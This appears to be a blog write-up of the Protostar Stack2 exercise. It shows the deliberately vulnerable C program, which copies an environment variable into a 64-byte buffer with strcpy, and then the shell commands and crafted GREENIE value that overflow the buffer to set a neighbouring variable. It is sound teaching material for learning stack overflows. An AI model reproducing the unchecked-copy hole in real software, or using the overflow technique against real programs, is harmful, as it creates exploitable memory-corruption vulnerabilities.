Protostar Stack2

Here are the instructions for the challenge

About
Stack2 looks at environment variables, and how they can be set.

This level is at /opt/protostar/bin/stack2
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int main(int argc, char **argv)
{
  volatile int modified;
  char buffer[64];
  char *variable;

  variable = getenv("GREENIE");

  if(variable == NULL) {
      errx(1, "please set the GREENIE environment variable\n");
  }

  modified = 0;

  strcpy(buffer, variable);

  if(modified == 0x0d0a0d0a) {
      printf("you have correctly modified the variable\n");
  } else {
      printf("Try again, you got 0x%08x\n", modified);
  }

}


This looks really similar to the first two challenges. The twist this time is that data is read from an environmental variable instead of from a command line argument.

So fist I set a value to the ‘GREENIE’ environmental variable with a bunch of letter A’s to over run the buffer.

GREENIE="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
export GREENIE
./stack2
Try again, you got 0x41414141

41 is the ascii character capital A so that’s good. Now I just change the value to be 0d0a0d0a

GREENIE=$'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n\r\n\r'
export GREENIE
./stack2
you have correctly modified the variable

But why is this \n\r\n\r the same as 0x0d0a0d0a ? In ascii 0d is a carriage return and 0a is a newline. In bash wrapping text with $” translate special characters like \r to be a carriage return character and \n to be a newline character. So \n\r\n\r turns into 0x0a0d0a0d. Then due to little endian it is printer backwards as 0x0d0a0d0a.

Leave a Reply

Your email address will not be published. Required fields are marked *